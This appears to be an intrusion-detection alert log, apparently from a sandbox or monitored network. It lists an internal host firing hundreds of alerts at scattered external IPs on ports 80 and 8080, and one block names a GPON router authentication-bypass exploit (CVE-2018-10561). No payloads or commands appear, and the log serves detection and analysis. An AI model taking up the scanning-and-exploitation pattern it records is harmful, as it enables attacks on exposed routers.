2024-11-28T07:28:09.544689+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44554	215.109.47.160	8080	TCP
2024-11-28T07:28:09.545821+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51748	40.57.210.168	80	TCP
2024-11-28T07:28:09.548802+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	46898	7.22.161.37	80	TCP
2024-11-28T07:28:09.549170+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	37394	60.38.64.161	8080	TCP
2024-11-28T07:28:09.553910+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54778	171.79.99.1	8080	TCP
2024-11-28T07:28:09.558835+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44434	155.189.226.125	80	TCP
2024-11-28T07:28:09.567443+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49896	126.106.74.156	8080	TCP
2024-11-28T07:28:09.572301+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	37876	46.35.54.91	8080	TCP
2024-11-28T07:28:09.580475+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49382	94.141.19.222	8080	TCP
2024-11-28T07:28:09.589279+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	34374	212.60.199.113	8080	TCP
2024-11-28T07:28:09.589648+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	59874	108.136.248.79	80	TCP
2024-11-28T07:28:09.591845+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	34472	89.109.61.141	8080	TCP
2024-11-28T07:28:09.592955+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	36122	14.204.207.237	8080	TCP
2024-11-28T07:28:09.597681+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	33192	25.76.24.63	8080	TCP
2024-11-28T07:28:09.598043+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55006	163.122.132.187	8080	TCP
2024-11-28T07:28:09.599186+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	33618	177.71.61.161	8080	TCP
2024-11-28T07:28:09.601332+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40352	221.124.199.74	80	TCP
2024-11-28T07:28:09.603560+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44366	19.106.226.188	80	TCP
2024-11-28T07:28:09.605387+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	57050	146.110.86.85	80	TCP
2024-11-28T07:28:09.608435+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44542	142.253.75.15	80	TCP
2024-11-28T07:28:09.613986+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	37650	119.37.208.253	80	TCP
2024-11-28T07:28:09.614351+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38900	167.201.110.208	8080	TCP
2024-11-28T07:28:09.615448+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49878	136.58.228.44	8080	TCP
2024-11-28T07:28:09.616177+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58306	102.6.12.154	8080	TCP
2024-11-28T07:28:12.384471+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49926	78.37.28.105	80	TCP
2024-11-28T07:28:15.212093+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53628	210.236.235.55	80	TCP
2024-11-28T07:28:21.506352+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41208	149.132.110.240	80	TCP
2024-11-28T07:28:21.507852+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54262	205.135.69.220	80	TCP
2024-11-28T07:28:21.508250+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49448	31.112.217.42	8080	TCP
2024-11-28T07:28:21.509692+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49594	155.174.193.236	8080	TCP
2024-11-28T07:28:21.520340+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40486	56.165.139.2	80	TCP
2024-11-28T07:28:21.521089+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	36932	210.146.43.159	80	TCP
2024-11-28T07:28:21.525866+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44298	68.239.15.161	8080	TCP
2024-11-28T07:28:21.528098+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	39918	86.204.100.185	8080	TCP
2024-11-28T07:28:21.531430+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51858	154.99.164.58	8080	TCP
2024-11-28T07:28:21.534717+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49866	56.59.236.152	80	TCP
2024-11-28T07:28:21.540241+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52944	41.90.240.235	8080	TCP
2024-11-28T07:28:21.541341+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47578	146.120.170.183	8080	TCP
2024-11-28T07:28:21.541714+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56390	146.211.235.115	8080	TCP
2024-11-28T07:28:21.542511+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	39666	18.64.144.254	8080	TCP
2024-11-28T07:28:21.546935+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51200	28.15.254.21	80	TCP
2024-11-28T07:28:21.551179+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35736	81.191.165.190	8080	TCP
2024-11-28T07:28:21.557819+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	46124	75.38.117.87	80	TCP
2024-11-28T07:28:21.560080+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53684	123.224.87.233	80	TCP
2024-11-28T07:28:21.560091+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50288	47.171.207.61	80	TCP
2024-11-28T07:28:21.560446+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	59518	64.105.173.62	8080	TCP
2024-11-28T07:28:21.561240+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54984	74.232.116.96	80	TCP
2024-11-28T07:28:21.563864+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51220	3.178.63.133	8080	TCP
2024-11-28T07:28:21.566416+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52552	122.78.77.224	8080	TCP
2024-11-28T07:28:21.572355+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58972	122.91.172.146	80	TCP
2024-11-28T07:28:21.579352+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35962	220.226.175.253	80	TCP
2024-11-28T07:28:21.580087+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56326	23.120.155.208	80	TCP
2024-11-28T07:28:21.582403+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54252	27.224.177.188	80	TCP
2024-11-28T07:28:21.583511+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52160	93.175.168.155	8080	TCP
2024-11-28T07:28:21.586851+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53268	212.67.65.96	8080	TCP
2024-11-28T07:28:21.587599+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	34816	143.125.99.60	8080	TCP
2024-11-28T07:28:21.593185+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54824	67.150.217.162	80	TCP
2024-11-28T07:28:21.593918+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48550	163.29.225.109	80	TCP
2024-11-28T07:28:21.595453+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40882	13.117.120.129	80	TCP
2024-11-28T07:28:21.598698+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42588	150.149.68.200	8080	TCP
2024-11-28T07:28:21.599480+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44352	68.164.136.214	8080	TCP
2024-11-28T07:28:21.600597+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49260	171.64.132.184	8080	TCP
2024-11-28T07:28:21.604658+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	39176	8.153.189.211	8080	TCP
2024-11-28T07:28:21.607943+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	59024	39.56.166.80	80	TCP
2024-11-28T07:28:21.608309+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42084	217.237.30.89	80	TCP
2024-11-28T07:28:21.609770+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47524	6.220.203.209	8080	TCP
2024-11-28T07:28:21.610127+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	46092	14.231.177.47	80	TCP
2024-11-28T07:28:21.610851+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58570	111.178.117.79	80	TCP
2024-11-28T07:28:21.611951+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	59770	87.28.80.213	8080	TCP
2024-11-28T07:28:21.613400+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43612	89.118.233.39	8080	TCP
2024-11-28T07:28:32.549793+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53358	191.216.182.119	80	TCP
2024-11-28T07:28:32.565842+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38178	116.234.135.2	80	TCP
2024-11-28T07:28:32.584872+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35260	5.184.240.243	80	TCP
2024-11-28T07:28:33.437950+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58480	102.29.6.122	8080	TCP
2024-11-28T07:28:33.527909+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48456	134.115.173.237	8080	TCP
2024-11-28T07:28:33.551825+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42784	26.96.28.18	8080	TCP
2024-11-28T07:28:35.511142+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49448	134.188.155.205	80	TCP
2024-11-28T07:28:35.518264+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	45426	166.84.151.1	8080	TCP
2024-11-28T07:28:35.519002+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42848	211.160.145.53	80	TCP
2024-11-28T07:28:35.590732+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52612	77.9.136.78	8080	TCP
2024-11-28T07:28:35.591471+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38204	69.166.73.188	8080	TCP
2024-11-28T07:28:35.606921+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47522	181.72.37.58	80	TCP
2024-11-28T07:28:35.607659+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55244	186.36.111.139	8080	TCP
2024-11-28T07:28:39.549853+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42354	154.79.187.211	80	TCP
2024-11-28T07:28:39.574593+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35230	92.35.26.114	80	TCP
2024-11-28T07:28:39.597422+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56152	105.8.172.69	8080	TCP
2024-11-28T07:28:40.528444+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	34340	102.19.97.234	80	TCP
2024-11-28T07:28:40.537912+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	57678	166.5.230.90	80	TCP
2024-11-28T07:28:40.599364+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40410	191.176.82.41	8080	TCP
2024-11-28T07:28:40.605973+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42786	20.197.222.38	80	TCP
2024-11-28T07:28:40.606343+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35804	124.161.90.253	80	TCP
2024-11-28T07:28:40.606719+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53688	25.51.224.241	8080	TCP
2024-11-28T07:28:42.508780+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43270	112.166.216.14	8080	TCP
2024-11-28T07:28:42.511857+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55632	58.156.77.139	80	TCP
2024-11-28T07:28:42.512239+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	32896	39.231.118.70	8080	TCP
2024-11-28T07:28:42.574990+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49372	193.97.201.89	80	TCP
2024-11-28T07:28:42.581337+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56516	68.202.31.243	8080	TCP
2024-11-28T07:28:42.608897+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38520	17.41.138.139	80	TCP
2024-11-28T07:28:43.539809+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48094	38.234.0.31	80	TCP
2024-11-28T07:28:43.545281+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60108	206.69.196.54	8080	TCP
2024-11-28T07:28:43.592981+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41814	126.11.35.172	8080	TCP
2024-11-28T07:28:43.606699+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58502	28.211.70.216	8080	TCP
2024-11-28T07:28:44.511852+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51248	84.26.53.77	8080	TCP
2024-11-28T07:28:44.540248+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38022	184.181.121.84	80	TCP
2024-11-28T07:28:44.564416+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40738	133.234.194.97	8080	TCP
2024-11-28T07:28:45.585149+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43382	4.155.205.250	8080	TCP
2024-11-28T07:28:46.383948+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	33552	36.37.163.126	80	TCP
2024-11-28T07:28:46.507202+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52712	109.187.50.192	80	TCP
2024-11-28T07:28:46.510809+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50532	213.49.162.7	80	TCP
2024-11-28T07:28:46.550829+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42488	67.225.203.21	8080	TCP
2024-11-28T07:28:46.579184+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43288	161.107.176.200	80	TCP
2024-11-28T07:28:47.528027+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58560	52.216.119.31	8080	TCP
2024-11-28T07:28:49.558511+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44136	189.235.157.14	80	TCP
2024-11-28T07:28:49.563626+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60018	141.91.48.70	8080	TCP
2024-11-28T07:28:50.537237+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50392	102.205.133.135	80	TCP
2024-11-28T07:28:50.569241+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35990	157.9.207.22	80	TCP
2024-11-28T07:28:50.576476+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43228	117.188.27.13	8080	TCP
2024-11-28T07:28:50.589687+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51094	27.187.181.115	80	TCP
2024-11-28T07:28:51.516853+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	57440	121.221.252.26	80	TCP
2024-11-28T07:28:51.545338+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	37000	35.76.164.73	80	TCP
2024-11-28T07:28:51.569057+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55676	148.149.231.148	8080	TCP
2024-11-28T07:28:52.511388+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55804	122.36.64.220	80	TCP
2024-11-28T07:28:53.512108+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54504	63.141.154.252	8080	TCP
2024-11-28T07:28:53.531115+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35316	166.239.65.81	8080	TCP
2024-11-28T07:28:53.535562+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60138	156.139.150.115	80	TCP
2024-11-28T07:28:53.546560+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35448	47.226.143.162	80	TCP
2024-11-28T07:28:53.601318+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	52540	142.227.211.164	80	TCP
2024-11-28T07:28:54.423349+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41994	182.176.99.26	8080	TCP
2024-11-28T07:28:54.582636+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42478	36.196.135.235	8080	TCP
2024-11-28T07:28:55.510451+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41554	4.178.55.71	80	TCP
2024-11-28T07:28:55.548323+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48258	183.208.109.253	80	TCP
2024-11-28T07:28:56.586276+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44526	174.144.195.87	80	TCP
2024-11-28T07:28:56.587058+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	54544	100.223.244.11	80	TCP
2024-11-28T07:28:56.596945+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56540	67.86.61.20	80	TCP
2024-11-28T07:28:57.508855+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	45394	56.79.248.138	8080	TCP
2024-11-28T07:28:57.532845+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35010	138.63.57.167	8080	TCP
2024-11-28T07:28:57.582123+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	36170	83.87.249.13	8080	TCP
2024-11-28T07:28:57.609809+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53348	60.219.84.98	80	TCP
2024-11-28T07:28:58.543147+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47838	54.119.208.65	80	TCP
2024-11-28T07:29:00.537421+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44034	6.189.246.31	80	TCP
2024-11-28T07:29:00.550567+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55798	18.99.224.10	80	TCP
2024-11-28T07:29:01.504503+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	59514	189.71.235.111	80	TCP
2024-11-28T07:29:01.535513+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	57976	115.35.224.29	8080	TCP
2024-11-28T07:29:01.611610+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48196	17.117.57.167	80	TCP
2024-11-28T07:29:02.552581+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55782	215.195.170.103	80	TCP
2024-11-28T07:29:03.542169+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	49290	20.14.91.237	8080	TCP
2024-11-28T07:29:03.542699+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43466	108.164.78.226	8080	TCP
2024-11-28T07:29:04.560337+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53674	66.50.61.61	80	TCP
2024-11-28T07:29:05.540240+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50634	126.153.201.46	80	TCP
2024-11-28T07:29:06.499824+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53716	104.127.76.71	80	TCP
2024-11-28T07:29:06.503828+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51524	136.134.157.27	80	TCP
2024-11-28T07:29:06.504191+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35368	18.11.140.73	8080	TCP
2024-11-28T07:29:06.504558+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50522	74.49.223.3	8080	TCP
2024-11-28T07:29:06.510807+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	57550	222.26.159.60	80	TCP
2024-11-28T07:29:06.528380+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35772	143.127.108.106	8080	TCP
2024-11-28T07:29:06.606518+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	58956	153.188.222.113	80	TCP
2024-11-28T07:29:07.516520+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	42048	92.199.43.118	8080	TCP
2024-11-28T07:29:07.533687+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60792	133.54.102.76	8080	TCP
2024-11-28T07:29:07.597167+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47828	151.249.26.134	8080	TCP
2024-11-28T07:29:08.530757+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55434	173.13.157.32	8080	TCP
2024-11-28T07:29:08.545711+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48898	98.3.111.173	80	TCP
2024-11-28T07:29:08.578664+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	33594	107.169.43.125	80	TCP
2024-11-28T07:29:08.582747+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	45268	155.180.226.34	8080	TCP
2024-11-28T07:29:09.574718+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	43446	48.138.159.48	80	TCP
2024-11-28T07:29:10.510961+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40428	141.97.17.250	8080	TCP
2024-11-28T07:29:10.544297+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48762	181.97.41.92	80	TCP
2024-11-28T07:29:10.595516+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	37970	153.48.91.16	8080	TCP
2024-11-28T07:29:11.532786+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41778	151.70.49.179	80	TCP
2024-11-28T07:29:12.553962+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41230	27.51.44.64	80	TCP
2024-11-28T07:29:13.139750+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	51012	188.40.107.13	80	TCP
2024-11-28T07:29:13.564709+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	35498	110.123.50.200	8080	TCP
2024-11-28T07:29:13.588173+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	56580	108.49.99.16	80	TCP
2024-11-28T07:29:15.508628+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60928	106.239.233.50	8080	TCP

ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T07:28:20.742304+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34262	30.84.48.130	80	TCP
2024-11-28T07:28:20.773895+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	53088	68.228.150.77	8080	TCP
2024-11-28T07:28:20.773975+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49262	55.92.215.83	80	TCP
2024-11-28T07:28:20.774430+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38934	140.221.39.242	80	TCP
2024-11-28T07:28:20.804549+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	43916	105.45.143.155	80	TCP
2024-11-28T07:28:20.929621+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45222	11.190.108.117	80	TCP
2024-11-28T07:28:20.929627+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45012	137.62.189.193	80	TCP
2024-11-28T07:28:20.930524+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49030	9.179.110.111	8080	TCP
2024-11-28T07:28:20.931940+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	36598	152.206.32.137	8080	TCP
2024-11-28T07:28:20.932029+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	53006	180.158.189.190	80	TCP
2024-11-28T07:28:20.932073+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	35764	9.31.4.141	8080	TCP
2024-11-28T07:28:20.937493+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	51822	120.121.182.155	8080	TCP
2024-11-28T07:28:21.049788+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34178	15.238.152.127	80	TCP
2024-11-28T07:28:21.052153+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46204	153.97.17.195	8080	TCP
2024-11-28T07:28:21.052215+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	51976	28.36.92.242	80	TCP
2024-11-28T07:28:21.169901+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	44862	214.89.56.229	80	TCP
2024-11-28T07:28:21.169914+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	52624	52.116.215.210	80	TCP
2024-11-28T07:28:21.169914+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34086	75.89.77.206	80	TCP
2024-11-28T07:28:21.169953+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	58492	81.241.101.2	8080	TCP
2024-11-28T07:28:21.170264+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	57024	24.158.93.235	8080	TCP
2024-11-28T07:28:21.170282+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	57430	109.90.191.175	8080	TCP
2024-11-28T07:28:21.170369+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	58462	170.20.179.231	8080	TCP
2024-11-28T07:28:21.170378+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50950	58.130.138.131	80	TCP
2024-11-28T07:28:21.170533+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	60608	28.115.34.207	80	TCP
2024-11-28T07:28:21.170616+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46996	136.27.141.23	8080	TCP
2024-11-28T07:28:21.170774+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	54464	40.134.41.147	80	TCP
2024-11-28T07:28:21.170823+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46042	193.206.30.210	8080	TCP
2024-11-28T07:28:21.170847+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45848	131.57.28.181	8080	TCP
2024-11-28T07:28:21.170877+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45072	209.161.87.32	8080	TCP
2024-11-28T07:28:21.170907+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49042	142.0.210.253	8080	TCP
2024-11-28T07:28:21.170970+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59610	103.210.62.103	80	TCP
2024-11-28T07:28:21.171006+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46302	187.46.100.111	80	TCP
2024-11-28T07:28:21.171058+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37136	197.96.116.135	80	TCP
2024-11-28T07:28:21.171084+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	53618	9.27.194.149	8080	TCP
2024-11-28T07:28:21.171192+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	54816	167.138.9.251	80	TCP
2024-11-28T07:28:21.171213+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37414	44.153.13.5	80	TCP
2024-11-28T07:28:21.171242+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50212	68.10.114.24	80	TCP
2024-11-28T07:28:21.423506+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	36546	217.237.6.188	80	TCP
2024-11-28T07:28:21.657581+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	33380	176.126.172.174	80	TCP
2024-11-28T07:28:24.142146+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	42400	102.193.207.146	8080	TCP
2024-11-28T07:28:31.705188+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46222	122.119.110.139	80	TCP
2024-11-28T07:28:31.814410+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	39868	209.78.212.21	8080	TCP
2024-11-28T07:28:31.851813+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	44986	191.45.226.73	8080	TCP
2024-11-28T07:28:31.892674+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	51316	215.40.71.26	8080	TCP
2024-11-28T07:28:31.939392+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55336	130.67.243.6	8080	TCP
2024-11-28T07:28:31.961794+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	57598	75.158.5.139	8080	TCP
2024-11-28T07:28:31.986325+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	57650	156.166.198.160	8080	TCP
2024-11-28T07:28:32.001892+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	32862	218.240.42.107	8080	TCP
2024-11-28T07:28:32.008217+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37466	14.55.151.40	80	TCP
2024-11-28T07:28:32.305030+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	54842	109.73.44.115	80	TCP
2024-11-28T07:28:32.305281+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55898	19.97.225.232	8080	TCP
